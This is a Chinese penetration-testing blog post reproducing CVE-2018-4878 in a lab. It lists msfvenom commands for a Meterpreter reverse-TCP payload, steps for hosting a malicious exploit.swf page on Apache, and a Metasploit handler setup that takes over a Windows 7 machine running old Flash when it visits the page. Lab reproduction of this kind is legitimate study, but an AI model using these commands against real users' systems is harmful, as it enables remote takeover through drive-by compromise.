WEB万网极研社渗透测试

CVE-2018-4878漏洞复现

2019-02-09  本文已影响63人  泽英君

开篇闲聊:

写了一篇,意犹未尽,然后决定再来一篇哈哈。

漏洞概述:

CVE-2018-4878是一个通杀Flash 28以前版本的漏洞,这个的威力更强,即靶机点击进入一个页面即可瞬间被攻陷!

可利用的Flash版本号

复现环境:

kail linux

Win7(我的Win10 Flash版本到31了。。。)

这里我引用一位大佬的复现素材,整理的很好!(链接:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密码:0li)

复现过程:

使用msfvenom生成shell代码

root@wuyou:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.190.134 lport=8888  -f  python>1.txt

root@wuyou:~# cat 1.txt

进入CVE-2018-4878-master目录,编辑CVE-2018-4878.py文件

将上面msfvenom生成的代码覆盖掉原来的代码:

修改下面的路径到自己存放的路径

进入存放的目录,执行命令:
root@wuyou:~/CVE-2018-4878# python cve-2018-4878.py

root@wuyou:~/CVE-2018-4878# ls -l

然后将其中两个文件放入Apache目录中,命令我已经给你们准备好了:

root@wuyou:~/CVE-2018-4878# service apache2 start

root@wuyou:~/CVE-2018-4878# cp index2.html /var/www/html/index2.html

root@wuyou:~/CVE-2018-4878# cp exploit.swf /var/www/html/exploit.swf

此时,Kali Linux上Web服务启动,并且具备index2.html这个页面。只要靶机启用flash并访问了这个页面,则可以直接被控制。

这时开启metasploit

root@wuyou:~# msfconsole

msf > use exploit/multi/handler

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/handler) > set lhost 192.168.190.134

msf exploit(multi/handler) > set lport 8888

msf exploit(multi/handler) > exploit

然后在安装了Flash28的Win7上开启页面192.168.190.134/index2.html

这时渗透机直接获取到Sessions

大功告成!

那么,怎么查看自己的的Flash版本呢?

这里我给大家推荐我自己的方法,在控制面板里找到程序和功能选项

一般就在第一个左右

上一篇下一篇

猜你喜欢

热点阅读